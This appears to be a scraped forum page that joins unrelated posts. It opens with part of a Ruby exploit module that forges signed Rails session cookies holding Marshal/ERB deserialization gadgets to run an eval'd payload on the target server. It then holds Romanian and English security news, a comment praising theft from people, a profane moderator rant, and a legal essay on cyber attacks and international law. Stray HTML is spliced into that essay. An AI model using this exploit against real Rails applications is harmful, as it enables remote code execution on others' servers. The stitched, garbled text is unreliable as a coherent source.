if inp inp.write(code) inp.close end else Kernel.fork do eval(code) end end {} ^.strip.split(/\n/).map{|line| line.strip}.join("\n") end def check_secret(data, digest) data = Rex::Text.uri_decode(data) if datastore['RAILSVERSION'] == 3 sigkey = datastore['SECRET'] elsif datastore['RAILSVERSION'] == 4 keygen = KeyGenerator.new(datastore['SECRET'],{:iterations => 1000}) sigkey = keygen.generate_key(datastore['SALTSIG']) end digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new(datastore['DIGEST_NAME']), sigkey, data) end def rails_4 keygen = KeyGenerator.new(datastore['SECRET'],{:iterations => 1000}) enckey = keygen.generate_key(datastore['SALTENC']) sigkey = keygen.generate_key(datastore['SALTSIG']) crypter = MessageEncryptor.new(enckey, sigkey) crypter.encrypt_and_sign(build_cookie) end def rails_3 # Sign it with the secret_token data = build_cookie digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"), datastore['SECRET'], data) marshal_payload = Rex::Text.uri_encode(data) "#{marshal_payload}--#{digest}" end def build_cookie # Embed the payload with the detached stub code = "eval('" + Rex::Text.encode_base64(detached_payload_stub(payload.encoded)) + "'.unpack('m0').first)" if datastore['RAILSVERSION'] == 4 return "\x04\b" + "o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" + ":\x0E@instanceo" + ":\bERB\x06" + ":\t@src"+ Marshal.dump(code)[2..-1] + ":\f@method:\vresult:" + "\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00" end if datastore['RAILSVERSION'] == 3 return Rex::Text.encode_base64 "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x06" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0C@method"+":\x0Bresult" end end # # Send the actual request # def exploit if datastore['RAILSVERSION'] == 3 cookie = rails_3 elsif datastore['RAILSVERSION'] == 4 cookie = rails_4 end cookie_name = datastore['COOKIE_NAME'] print_status("Checking for cookie #{datastore['COOKIE_NAME']}") res = send_request_cgi({ 'uri' => datastore['TARGETURI'] || "/", 'method' => datastore['HTTP_METHOD'], }, 25) if res && res.headers['Set-Cookie'] match = res.headers['Set-Cookie'].match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) end if match if match[1] == datastore['COOKIE_NAME'] print_status("Found cookie, now checking for proper SECRET") else print_status("Adjusting cookie name to #{match[1]}") cookie_name = match[1] end if check_secret(match[2],match[3]) print_good("SECRET matches! Sending exploit payload") else fail_with(Exploit::Failure::BadConfig, "SECRET does not match") end else print_warning("Caution: Cookie not found, maybe you need to adjust TARGETURI") if cookie_name.nil? || cookie_name.empty? # This prevents trying to send busted cookies with no name fail_with(Exploit::Failure::BadConfig, "No cookie found and no name given") end if datastore['VALIDATE_COOKIE'] fail_with(Exploit::Failure::BadConfig, "COOKIE not validated, unset VALIDATE_COOKIE to send the payload anyway") else print_status("Trying to leverage default controller without cookie confirmation.") end end print_status "Sending cookie #{cookie_name}" res = send_request_cgi({ 'uri' => datastore['TARGETURI'] || "/", 'method' => datastore['HTTP_METHOD'], 'headers' => {'Cookie' => cookie_name+"="+ cookie}, }, 25) handler end end

Expertii Kaspersky Lab au inregistrat in luna iunie o crestere cu 1,4 puncte procentuale a mesajelor de tip spam din traficul total de email-uri, ajungand la o medie de 71,1%. Atasamentele malware au fost identificate in 1,8% din numarul total de email-uri, cu un punct procentual mai putin comparativ cu luna anterioara. In iunie, spammerii s-au folosit activ de numele fondatorului Apple, Steve Jobs. In subiectul mesajului nesolicitat, destinatarul era invitat sa afle secretul succesului omului de afaceri, insa corpul mesajului continea o reclama pentru o sesiune de cursuri gratuite. Organizatorii acestora promiteau ca in numai 1,5h pot invata pe oricine sa transforme un hobby intr-o afacere profitabila. Numele lui Steve Jobs era folosit pentru a atrage atentia asupra programului de pregatire. Pe langa mesajele care promovau cursuri de pregatire si promiteau sa dezvaluie secretul succesului lui Steve Jobs, in luna iunie au fost identificate mai multe mesaje de tip spam care ofereau reduceri semnificative de pret pentru produse Apple. Pentru a face email-urile sa para legitime, scammerii au introdus numele companiei la categorie ‘From’, desi adresa de email folosita nu avea nicio legatura cu Apple. Autorii acestor mesaje subliniau faptul ca mai exista un numar limitat de produse si ca era esential ca persoanele interesate sa le cumpere inainte de epuizarea stocului. Acest truc frecvent intalnit era folosit pentru a-l incuraja pe utilizator sa ia o decizie cat mai rapid si sa intre direct pe link-ul trimis pentru a-si comanda produsele. Un alt subiect exploatat de spammeri a fost oferta de admitere la universitati din SUA, precum si alte oferte de cursuri online care puteau fi puse la dispozitia utilizatorilor. Aceste email-uri includeau adesea link-uri catre pagini cu formulare de inregistrare pentru cursul respectiv. Insa, adresele pentru paginile web variau de la email la email si erau adesea create chiar in ziua in care mesajul era trimis. Probabil aceasta era metoda prin care autorii care trimiteau mesajele in masa colectau date personale despre utilizatori. „In iunie, spammerii au continuat sa foloseasca trucurile cunoscute”, a comentat Tatyana Shcherbakova, Senior Spam Analyst in cadrul Kaspersky Lab. „S-au evidentiat, in schimb, cateva serii de mesaje trimise in masa care promovau tigari conventionale si electronice, pentru care autorii au folosit serviciul Google Translate. In plus, spammerii au adaugat la finalul acestor linkuri un set de litere si de nume ale unor domenii Google in diferite limbi, generate aleatoriu”, a declarat Tatyana Shcherbakova. Precum in luna anterioara, o mare parte din suma totala de mesaje spam la nivel mondial a provenit din China (24%) si din SUA (17%). Coreea de Sud s-a pozitionat pe locul al treilea in clasament, fiind responsabila pentru 14% din numarul total de mesaje spam. Coreea de Sud a ramas principala sursa de spam pentru utilizatorii din Europa (53,3%), contributia sa crescand cu 9,6 puncte procentuale in iunie. Statele Unite (4,6%) si Vietnamul (3,7%) au coborat pe locurile patru, respectiv cinci in clasament, cedand pozitiile de luna anterioara Italiei (6,7%), respectiv Taiwanului (5%). Contributia Italiei a crescut cu 3,9 puncte procentuale comparativ cu luna mai, cand se afla abia pe locul sapte in clasament. Atasamente malware au fost detectate in 1,8% din numarul total de email-uri transmise. La fel ca in luna anterioara, scammerii au folosit trucul lor preferat – notificarile ce par a fi trimise din partea unor companii foarte cunoscute. In luna iunie, numarul de atacuri care au avut ca tinta serviciile de email si mesagerie instant a evoluat semnificativ, deoarece in perioada concediilor de vara, numarul utilizatorilor de email si ICQ, Jabber, Skype etc. creste, de asemenea. Exista o cerere foarte mare pentru acest tip de conturi pe piata neagra, ceea ce incurajeaza phisherii sa incerce tot mai mult sa obtina astfel de informatii. Versiunea completa a raportul referitor la evolutia spamului in luna iunie 2013 este disponibil pe : securelist.com Source FaraVirusi.Com

Mie mi se pare genial sa le furi banii oamenilor in modul asta.

649.000 de dolari reprezinta costul mediu pe care il au de suportat companiile in urma unui atac cibernetic, potrivit studiului 2013 Global Corporate IT Security Risks desfasurat de B2B International, in parteneriat cu Kaspersky Lab. Orice atac cibernetic poate aduce prejudicii unei companii, insa B2B International a analizat felul in care pot fi cuantificate aceste daune din punct de vedere financiar. In 2013, expertii B2B International au calculat pierderile rezultate din atacuri cibernetice, bazandu-se pe rezultatele unei cercetari care a implicat mai multe companii din intreaga lume. Pentru a face o estimare cat mai exacta a costurilor, B2B a analizat doar incidentele care au avut loc in ultimele 12 luni, iar evaluarea s-a bazat pe informatii cu privire la pierderile suferite ca rezultat direct al incidentelor de securitate. Costurile includ doua componente principale: - Daunele cauzate de incidentul in sine – de exemplu pierderile provenite din scurgerile de informatii confidentiale, de intreruperea continuitatatii activitatii si de costurile pentru angajarea specialistilor pentru remedierea incidentelor; - Costurile asociate cu reactiile neplanificate, necesare pentru a preveni alte atacuri similare pe viitor, inclusiv angajarea/pregatirea angajatilor si a elementelor hardware si software si alte actualizari de infrastructura. Cercetatorii nu au inclus in aceasta analiza date despre unele pierderi si costuri suferite de un numar redus de companii, cum ar fi costuri legate de nevoia de a lansa o declaratie publica despre incident. Structura costurilor Una dintre primele concluzii a fost ca cele mai mari pierderi sunt cauzate de incidentul in sine – oportunitati si profituri pierdute, precum si plati catre specialistii care se ocupa de remediere, costurile medii fiind de 566.000 de dolari. Costurile legate de actiunile proactive, cum ar fi angajarea de oameni noi si pregatirea acestora, precum si actualizarea infrastructurii hardware si software, pot ajunge la aproximativ 83.000 de dolari. Daunele pot varia in functie de regiunea in care opereaza compania atacata. De exemplu, cele mai mari daune au fost asociate cu incidente care au implicat companii care opereaza in America de Nord – ajungand la o medie de 818.000 dolari. Suma fost numai cu putin mai mica in America de Sud, ajungand la 813.000 dolari. In urma atacurilor cibernetice, companiile din Europa au inregistrat pierderi cu o medie usor mai mica, dar substantiala, de 627.000 dolari. Costurile IMM-urilor Costurile atacurilor cibernetice ale caror victime sunt companiile mici si mijlocii sunt mai scazute decat cele marilor corporatii. Insa, tinand cont de dimensiunea acestor companii, sumele reprezinta, totusi, o lovitura grea. Pierderea medie inregistrata in urma incidentelor de securitate IT care au afectat IMM-urile a fost de 50.000 de dolari, dintre care 36.000 de dolari au reprezentat costul incidentului in sine, pe cand restul sumei, de 14.000 de dolari, reprezinta cheltuieli asociate. IMM-urile care au inregistrat cea mai mare suma medie a costurilor in urma atacurilor cibernetice au fost cele din Asia-Pacific, cu pierderi de 96.000 de dolari. In Europa, aceasta suma a fost de 55.000 de dolari, iar in America de Sud, de 45.000 de dolari. Cele mai mici pierderi inregistrate in urma atacurilor cibernetice au fost cele din Rusia, unde media a fost de 21.000 de dolari. De asemenea, analiza a dezvaluit faptul ca, in anumite cazuri, pierderile financiare suferite de companiile mici sunt insotite de alte pierderi, care ajung la aproximativ 5% din veniturile anuale. De exemplu, o companie a pierdut toata afacerea din regiunea unde avusese succes inainte, din cauza unui astfel de incident. Protectia optima O concluzie foarte importanta care poate fi conturata in urma acestui studiu este ca pana si cele mai distructive si costisitoare atacuri ar fi putut fi prevenite. Atacurile au exploatat bresele din sistemul de securitate al companiei, care ar putea fi remediate in cazul in care corporatiile ar fi folosit solutii de securitate IT si ar fi gestionat infrastructura IT in mod corespunzator. Solutia Kaspersky Endpoint Security for Business asigura protectie eficienta impotriva tuturor tipurilor de amenintari cibernetice, inclusiv a atacurilor cu tinta predefinita. De asemenea, produsul permite folosirea unor functii cheie, precum administrarea automata a patch-urilor si scanarea vulnerabilitatilor, capabile sa asigure update-uri regulate si consistente pentru dispozitivele companiei, precum si integrarea in siguranta a dispozitivelor mobile in reteaua companiei. In mod obisnuit, companiile care cad in capcanele atacurilor cibernetice ajung sa inteleaga importanta si valoarea acestor solutii de securitate numai dupa ce incidentele au loc – expunandu-se unor pierderi financiare aditionale care puteau fi prevenite. O comparatie simpla intre nivelul costului si al pierderilor cauzate de atacul cibernetic arata ca, in majoritate a cazurilor, investitia intr-o solutie de securitate de calitate si eficienta ar fi costat considerabil mai putin decat costurile aparute in urma pierderilor. Source FaraVirusi.Com

The USA's National Security Agency (NSA) has issued a document titled ( The National Security Agency: Missions, Authorities, Oversight and Partnerships(PDF) that explains some of its operations and includes a claim it “... touches about 1.6%... “ of daily Internet traffic and “...only 0.025% is actually selected for review.” Released on Saturday with little fanfare, the document's prologue explains that the NSA lacked tools to track one of the 9/11 hijackers. As a result “Several programs were developed to address the U.S. Government's needs to connect the dots of information available to the intelligence community and to strengthen the coordination between foreign intelligence and domestic law enforcement agencies.” It goes on to explain the legal underpinnings of the Agency's work and identify the following methodology for its work: 1. NSA identifies foreign entities (persons or organizations) that have information responsive to an identified foreign intelligence requirement. For instance, NSA works to identify individuals who may belong to a terrorist network. 2. NSA develops "the network" with which that person or organisation's information is shared or the command and control structure through which it flows. In other words, if NSA is tracking a specific terrorist, NSA will endeavor to determine who that person is in contact with, and who he is taking direction from. 3. NSA identifies how the foreign entities communicate (radio, e-mail, telephony, etc.) 4. NSA then identifies the telecommunications infrastructure used to transmit those communications. 5. NSA identifies vulnerabilities in the methods of communication used to transmit them. 6. NSA matches its collection to those vulnerabilities, or develops new capabilities to acquire communications of interest if needed. The money shot comes in a section titled “Scope and Scale of NSA Collection” that reads as follows: “According to figures published by a major tech provider, the Internet carries 1,826 Petabytes of information per day. In its foreign intelligence mission, NSA touches about 1.6% of that. However, of the 1.6% of the data, only 0.025% is actually selected for review. The net effect is that NSA analysts look at 0.00004% of the world's traffic in conducting their mission – that's less than one part in a million.” It also means the NSA is “touching” a couple of terabytes a day. And let's also ponder just what “selected for review” means. Is it reading by humans? Processing by machines? The NSA would have us believe that whatever's going on, “NSA personnel are obliged to report when they believe NSA is not, or may not be, acting consistently with law, policy, or procedure.” “This self-reporting is part of the culture and fabric of NSA,” the document continues. “If NSA is not acting in accordance with law, policy, or procedure, NSA will report through its internal and external intelligence oversight channels, conduct reviews to understand the root cause, and make appropriate adjustments to constantly improve.” The Reg imagines leakers workings for contractors were not on the NSA's list of “external intelligence oversight channels”. Edward Snowden thrusting himself into that role may be the reason this document was published. ® Bootnote Here at Vulture South we write in a word processor (Lotus Symphony) and then enter the results into The Reg's content management system. While cutting and pasting sections of the document into Symphony, we found some oddities. For example, the list describing the NSA's methodology, in point 2, looks like this even when pasted unformatted: We found several such instances throughout the document and imagine it is the NSA's idea of a joke. Source TheRegister.co.uk

Users of Android Bitcoin apps have woken to the unpleasant news that an old pseudo random number generation bug has been exploited to steal balances from users' wallets. The Bitcoin Foundation's announcement, here, merely states that an unspecified component of Android “responsible for generating secure random numbers contains critical weaknesses, that render all Android wallets generated to date vulnerable to theft.” Such wallets would include Bitcoin Wallet, blockchain.info wallet, BitcoinSpinner and Mycelium Wallet. The problem is this: the elliptic curve digital signature algorithm – ECDSA – demands that the random number used to sign a private key is only ever used once. If the random number generator is used twice, the private key is recoverable. This blog post, describing a presentation given at the RSA conference in March, gives a hint at what's going on. It described how the Java class SecureRandom (used by the vulnerable wallets) can generate collisions for the value r. Moreover, r collisions appear to have been spotted in the wild as early as January – although the author of that post, Nils Schneider did not link the collision to SecureRandom. According to The Genesis Block, SecureRandom was flagged by Google's Mike Hearn as the problem, in an e-mail to Bitcoin developers: “Android phones/tablets are weak and some signatures have been observed to have colliding R values, allowing the private key to be solved and money to be stolen”. Hearn says the Bitcoin Wallet app “has been prepared that bypasses the system SecureRandom implementation and reads directly from /dev/urandom instead, which is believed to be functioning correctly. All unspent outputs in the wallet are then respent to this new key.” Given, however, the prior observations both of Bitcoin signature collisions and SecureRandom problems, The Register has asked Hearn if developers should have been advised to avoid SecureRandom sooner. ® Sursa TheRegister.co.uk

How many networks do you want to run to enable the internet of bits? A group of researchers from Greece's University of Thessaly and the Centre for Research and Technology Hellas believe there's scope for energy consumption reductions of as much as 75 percent if 802.11n's energy saving extensions are combined with frame aggregation techniques. The reason this is important? Because, as wireless devices outrun fixed connections for existing users, new users, and the default connection type for the much-touted Internet of Bits (which Vulture South hopes becomes known as the iNoB), power consumption out at the edge of the Internet is going to be a shocker. For example, earlier this year the University of Melbourne's Centre for Energy Efficient Telecommunications (CEET) stated that the network edge is responsible for around ten times the energy consumption attributable to data centres. As the number of end user devices skyrockets, so will the amount of energy consumed in the access network to serve them. CEET also predicts that the “wireless cloud” will demand more than 4.5 times as much electricity in 2015 than it did in 2012. While 802.11n includes a variety of power saving modes, these focus on sleep and idle modes – they don't save power if the interface is active. Getting transmit/receive power consumption down is much harder. Which brings us back to the Thessaly/CRTH benchmarking work published at Arxiv, here. Among other things, the researchers demonstrate that frame aggregation can have a big impact on power consumption in the 802.11n world. With A-MPDU aggregation active, the researchers found, the energy consumption per transmitted bit is 75 percent lower than without aggregation. A last word: we all know that 802.11n can in theory hum along at up to 600Mbps. The current favorite for internet of things wireless connections, over short distances at least, is Bluetooth SMART (aka Bluetooth Low-Energy or BLE) which operates at up to 24 Mbps. Few remote sensors will need 802.11n's speed, but few organisations like the idea of running multiple networks. If frame aggregation helps to get 802.11n power consumption competitive with Bluetooth, it could make single-network sensor strategies sensible. ® Source TheRegister.co.uk

Bai prieteni aveti deja topic special unde sunt 1000000000000000000000000000 de posturi pentru invitatii in pula mea.Sunteti atat de idioti incat nu sunteti in stare sa dati un search pe forum. https://rstforums.com/forum/24670-invitatii-filelist-invitatie-demonoid-invitatie-lasttorrents-invitatii-trackere.rst In primul post scrie clar : Bagati-va pula cat vreti in topicul asta. M-au disperat copilasii care isi fac cont doar ca sa cerseasca invitatii pe trackere. Nu de alta dar ati umplut forumul de "cereri invitatii si conturi", numai useri cu cont nou si la fiecare topic e un post unde se cerseste invitatie, pe care bineinteles niciunul dintre moderatori nu il vede.

Part I : https://rstforums.com/forum/73435-fitting-cyber-attacks-jus-ad-bellum-consequence-based-approach-part-i.rst Part II : https://rstforums.com/forum/73508-fitting-cyber-attacks-jus-ad-bellum-consequence-based-approach-part-ii.rst I. Criticism and possible flaws of consequence-based approach and seven-factor test There are people from the field of law, and not only, who do not think that everything with fitting cyber attacks to the law of resort to use of force with the help of consequence-based approach will go smooth and silky. One of them, Jason Barkham, is highly critical of Michael Schmitt’s seven-factor test and the consequence-based theory as a whole. Low-level cyber attacks To begin with, the comparison, analysis, and adherence of the conventional military force do not correspond well with such an innovative form of warfare that cyber attacks represent. Moreover, the Schmitt’s method cannot cope properly with the low-level cyber attacks because they’re out of the use of force range under his analysis. In event of a real attack, the target would just have to guess whether its magnitude is significant enough (Barkham, 2001). Presumptive Legitimacy factor On the other hand, the legitimacy factor has an improper function. The main question in a given case is whether a cyber attack is a use of force or a mere act of coercion—the former is illegitimate and the latter is legitimate, at least in the eye of Article 2(4) of the UN Charter. Then, assuming that an act is legitimate in advance to establish at some point later whether it is force of coercion is devoid of sense. “In effect,” Barkham (2001, p. 85-86) writes, “Schmitt’s approach is backwards, because it requires determining the legitimacy of an attack under the international law (i.e., distinguishing between acts of coercion and uses of force) by asking whether the attack is legitimate.“ Analysis after the fact Another important blemish is the consideration that cyber attacks “cannot be assessed readily at the time of the attack to determine their magnitude and permitted responses (Barkham, 2001, p. 86).” Any framework that requires ex-post analysis would be ineffective to solve this problem. Adding to this fact the inherent feature of these types of aggression—the existence of severe obstacles in identifying the wrongdoer, a.k.a. attribution problem—we can recognize the reason that would probably make imperative waiting before responding (Barkham, 2001). Because the consequences need to be readily available, demand of accurate analytical results under the methodology in question would necessitate the victim state to wait for the attack to commence. Undoubtedly, this prudent behaviour would diminish considerably the chances for successful defence, especially if the attack is ongoing and the victim state needs to react immediately to protect itself. Therefore, a post factum analysis stands most likely no alternative due to the specific nature of cyber attacks which can undergo quick modifications and in a matter of an instant to shift from an act having perfectly legal status to a severe violation of jus ad bellum (Ophardt, 2010). The following statement comes as a direct continuation of the line of thought made in the previous point: “the greatest flaw in Schmitt’s proposal” is its inability to cope with the flexible nature of cyber attacks—”states faced with a decision of how to respond to a cyber attack that could quickly morph into clearly aggressive act lack guidance on the appropriate response (Ophardt 2010 p. 24).” Curiously, but even the aggressor may not know exactly what kind of consequences are going to crop out after a given cyber attack takes place. Consequently, the wrongdoer may have serious difficulties assessing the exact outcome of the attack and also considering all possibilities like secondary and tertiary effects (Hathaway et al., 2012). Nevertheless, Sklerov speaks in defence of the consequence-based approach, ascertaining that “in no way does effects-based analysis require a state to delay its response until it can fully measure a computer network attack against all six of Schmitt’s proposed axes. Decision-makers, at times, must make choice with imperfect information (Sklerov 2009: 70).“ Additional questions that need resolution The application of consequence-based interpretation leads to the emergence of insidious secondary questions with regard to: Proportionality of an armed response — difficult to assess consequences and measure the eventual casualties Imminence — difficult to discern the onset of cyber assault and the fact that typically the attack sequences happens in split seconds Responsibility — calculation of attribution dilemma is inevitably bound to cause doubts about protagonist non-state actors with loose relationships to states (Waxman, 2013) Consequence-based approach and politics As one scholar notes: “Very challenging for lawyers applying an effect-based (consequence-based) analysis, it may not be quite so problematic in practice, because States are unlikely to respond to small-scale attacks with military force (Waxman, 2013, p. 120).” Political planners and decision-makers will have to face very challenging situations when they bid for domestic support for more drastic responses, that is, military actions against isolated cyber attacks which do not breed significant publicly discernible consequences. By comparison with low-level hostile kinetic assaults, in those situations a counterattack is practically not only justified but demanded politically (Waxman, 2013). II. Final Plea: Consequence-based vs. Target-based vs. Instrument-based Table: The strong sides of each method For the sake of breaking most of the stereotyped summaries, let us put the beloved “consequence-based” methodology in defensive position on an imaginary testimony box and then throw at it some accusations of ‘incompetence’ when compared to the other two proposals that adjust cyber warfare to the jus ad bellum. Arguments in favour of target-based over the consequence-based The following statement sees a defect in the consequence-based mechanism when it has to tune up national infrastructures from critical importance: Presumably, opponents generally criticize the consequence-based approach because it would be a useful tool after the attack has really taken place. In addition, the unique character of cyber attacks predisposes decision-makers to take prompt reactions regarding ongoing cyber attacks and the consequence-based analysis would prove itself unreliable for dealing with these situations. As noted before, in order to evaluate the consequences, the victim should wait until they suffer real damages. Therefore, in situations of attack against critical national infrastructure many scholars advocate an immediate response, pointing out that it would be too risky to waste time assessing the magnitude of the attack while this vital critical national infrastructure is at stake (Sklerov, 2009). Arguments in favour of instrument-based over the consequence-based While the instrument-based approach distinguishes itself with relative simplicity of application and there are up to this moment amassed a significant number of state practice and cases, the situation with a probable promulgation of the consequence-based method may be unsatisfactory. The main problem perhaps would be unclarity and lack of state practice which eventually will lead, as Schmitt (1999) admits, to occurrence of a grey area. On the other hand, a resort to the instrument-based technique provides the interpreter with a standard with which is easy to predict the nature of acts without impairing its internal coherence. The instrument-based approach allows for more consistent application of the acts in concordance with the already existing normative structure. Thus, this fact would lead us to the conclusion that the international community would be more inclined to adopt this method while the legal scheme is the same, mostly because this would avoid an unwanted confusion and disputes (Schmitt, 1999). Arguments in favour of consequence-based In order to transfer smoothly the exchange of arguments, we ought to begin with the consequence-based approach plea by saying that it is not a question that the community did not seek to put a greater emphasis on the consequences. Simply for practical reasons, at the moment of drafting the UN Charter, it was perhaps more reasonable for the states to adopt a method which is more widely accepted and known (Schmitt, 1999). Back then it was the logical choice because the conflicts waged with conventional traditional weapons are simply identifiable. The instrument-based approach certainly gave a time-efficient result. Nevertheless, most of the scholars interested in studying cyber attacks and their significance in the arena of international law opine that since the cyber attacks have unique features that are not comprehensively covered by the legal mechanisms, another approach would bear better results than the obsolete instrument-based criteria (Hathaway et al., 2012). Jonathan A. Ophardt (2010) thinks that Michael Schmitt’s true belief about the original intention of the drafters is that they have wanted to regulate the consequences of an armed attack between states. Instead, the drafters have decided that a restriction on the means would be more convenient approach due to legal normative standards they needed to take into consideration. Consequently, “the interpretive dilemma” (Schmitt, 2011, p. 573) arises from the fact that in enacting the legal framework based on the instruments of force and coercion, the drafters sought to restrict also obliquely the consequences of these acts (Ophardt, 2010). In support of this rationale comes a 1999 Assessment International Legal Issues in Information Operations made by the U.S. Defense Department: Right after this quote comes another one which highlights the turning point in this line of thought : Moreover, Schmitt argues that “scheme-imbuing consequences, rather than acts, with normative valence are nothing new (Schmitt, 1999, p. 20).” By way of example, here are several logical assertions that may back up analogously the consequences supremacy over the acts themselves: The prohibitions in Protocol I to the Geneva Conventions on starvation of civilians, infliction of “widespread, long-term and severe damage” to the environment (Article 55 (1) of Additional Protocol I), and attacks on facilities that” may cause the release of dangerous forces and consequent severe losses among the civilian population (Article 56 (1) of Additional Protocol I).” The Environmental Modification Convention ban on the utilization of any modified environmental tools and procedures for hostile purposes that may bring “widespread, long-lasting or severe effects“(1978, p.7) The principle of proportionality (Article 56(5) ( AP I) that seeks to balance the positive consequences as military initiative against the negative ones as superfluous death/injury to individuals or destruction/damage to tangible objects Even if a particular approach is forbidden by a certain international provision, usually the norm that approves the act has a consequence-based character (Schmitt, 1999). Apparently, the consequence-based declaratory style predominates in the jus in bello design as well (Schmitt, 1999). Knut Dörmann in his paper “Applicability of the Additional Protocols to Cyber attacks” (2004) also centers his approach on the consequences, but he deems that an attack doesn’t have to bear always violent consequences as death, injury of civilians or soldiers, or destruction, damage to tangible objects (Adler, 2011). The consequence-based approach—the leading guideline If we take into account all these arguments, it would right away make sense why the predominant view of most experts privy to international law and IT (2009) speaks in support of the consequence-based approach, defining it as “the best analytical model for dealing with cyber attacks (Sklerov, 2009, p. 68).” To stand out in sharp contrast, this method includes the cases which the instrument-based framework regulates and on top of that it includes events of attacks that are non-kinetic. The consequence-based approach is also better than the strict liability analysis — the other denomination of the target-based approach — because it doesn’t violate the international norms and customs. (Sklerov, 2009). Admittedly, the current normative scheme cannot cope well with non-kinetic acts and that perhaps “a new normative architecture” is required to take into account these acts. Applying consequence-based approach may put policy-makers in position in which the existing law needs an interpretation, needs an extension beyond what textually prescribes. Strictly speaking, that broad interpretation/extension beyond the current paradigm constitutes a new standard (Schmitt, 1999). Others find that the jus in bello is well-established so to adjust itself to new categories and means of warfare. The big problem with the cyber attacks is that they don’t exist in a specific environment — they can cause both physical (hardware) and non-material damage (software) (Brown, 2006). Nevertheless, a point should be made that even though the current jus ad bellum and in bello don’t regulate well the cyber attacks, they can still serve as “a model for devising rules.” (Brown, 2006, p. 183) With respect to that “if the definition of a use of force is static, then the ban on the use of force gradually will become less effective as new interstate actions occur beyond the boundaries of what the drafters considered (Bond, 1996, p. 29).” Conclusion Although only a small number of interstate cyber attacks reach the high threshold, apparently, applying the existing jus ad bellum norms to those cases could be very challenging. Again, fitting or adjusting these new forms of warfare necessitate a dose of interpretation skills mixed up with a pinch of majestic improvisation and talent to see the norms a bit out of their initial modus operandi. Many deem, that not only the current jus ad bellum laws fail to accomplish the assignment to classify the cyber attacks as an armed attack or a use/threat of force, but also uncover major fractures in the legal system. The truth is that the process of fitting an act to the legal system is dictated by the fact that at the time of the drafting of the UN Charter there were no cyber attacks. Otherwise, the drafters would have created a norm regulating cyber attacks with which this acts could be categorized in terms of quantity and quality. Turning our sight again to the three approaches, we realize that the proposed set of techniques may come into purpose to give some interpretative solution that may work well under the current legal framework so that the past and the future can converge and find a common language. Nevertheless, the definition of ‘fitting’ is an action or act of one that fit (Meriam-Webster dictionary), a meaning which expresses some activities inclined to bear a particular form of straining something which is cast in a different mould. Ultimately, it seems vital then that in the most sublime moments of straining not to be gone beyond the breaking-point. Reference List Adler. H. (2011). Cyber Bellum? Retrieved from http://law.huji.ac.il/upload/AdlerHilaUpdated%281%29.pdf Barkham, J. (2001). Information warfare and international law on the use of force. N.Y.U.J. INT’L L. & POL 57, 34. Bond, J.N. (1996). Peacetime Foreign Data Manipulation as One Aspect of Offensive Information Warfare: Questions of Legality under the United Nations Charter Article 2(4). Retrieved from www.au.af.mil/au/awc/awcgate/navy/nwc_bond.pdf Brown, D. (2006). A Proposal for an International Convention To Regulate the Use of Information Systems in Armed Conflict. Harvard: Harv. Int’l L.J. Dörmann, K. (2004). The applicability of the additional protocols to computer network attacks: an ICRC approach. In Bystrom, K. (Ed.), International Expert Conference on computer network attacks and the applicability of international humanitarian law: Proceeding of the Confrence. Stockholm: National Defence College. Environmental Modification Convention (1978). Retrieved from Environmental Modification Convention ICRC (1977). Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of International Armed Conflicts (Protocol I). Retrieved from </title> <link rel="stylesheet" type="text/css" href="/xsp/.ibmxspres/.mini/css/@Da&@Ib&2Tfxsp.css&2TfxspLTR.css.css"> <script type="text/javascript" src="/xsp/.ibmxspres/dojoroot-1.6.1/dojo/dojo.js" djConfig="locale: 'fr-ch'"></script> <script type= Hathaway, O., Crootof, R., Levitz, P., Nix, H., Nowlan, A., Perdue, W., Spiegel, J. (2012). California Law Review, 100 (4), 817-886. Ophardt, J. A. (2010). Cyber Warfare and the Crime of Aggression: the Need for Individual Accountability on Tomorrow’s Battlefield, Duke L. & Tech. Rev, 003. Sklerov, M. (2009). Solving the dilemma of state responses to cyberattacks: A justification for the use of active for the use of active defences against states who neglect their duty to prevent. (Master’s Thesis, The Judge Advocate General’s School, USA) Schmitt, M. (1999). Computer network attack and use of force in international law. Columbia Journal of Transnational Law, 37, 885-937. Schmitt, M. (2011). Cyber operations and the jus ad bellum revisited. Villanova Law Review, 56, 569-606. Stevens, (2009). Internet War Crimes Tribunals and Security in an Interconnected World. Retrieved on 02/07/2013 from http://www.uiowa.edu/~tlcp/TLCP%20Articles/18-3/stevens.finalfinal.me.mlb.100109.pdf United Nations (1945). United Nations Charter. Retrieved from Charter of the United Nations U.S. Defense Department (1999). An assessment of international legal issues in information operations. Retrieved on 02/07/2013 from http://www.au.af.mil/au/awc/awcgate/dod-io-legal/dod-io-legal.pdf Waxman, M. (2013). Self-Defensive Force Against Cyber Attacks: Legal, Strategic and Political Dimensions. Retrieved on 02/07/2013 from Self-Defensive Force Against Cyber Attacks: Legal, Strategic and Political Dimensions by Matthew C. Waxman :: SSRN Source Resources.InfosecInstitute.COM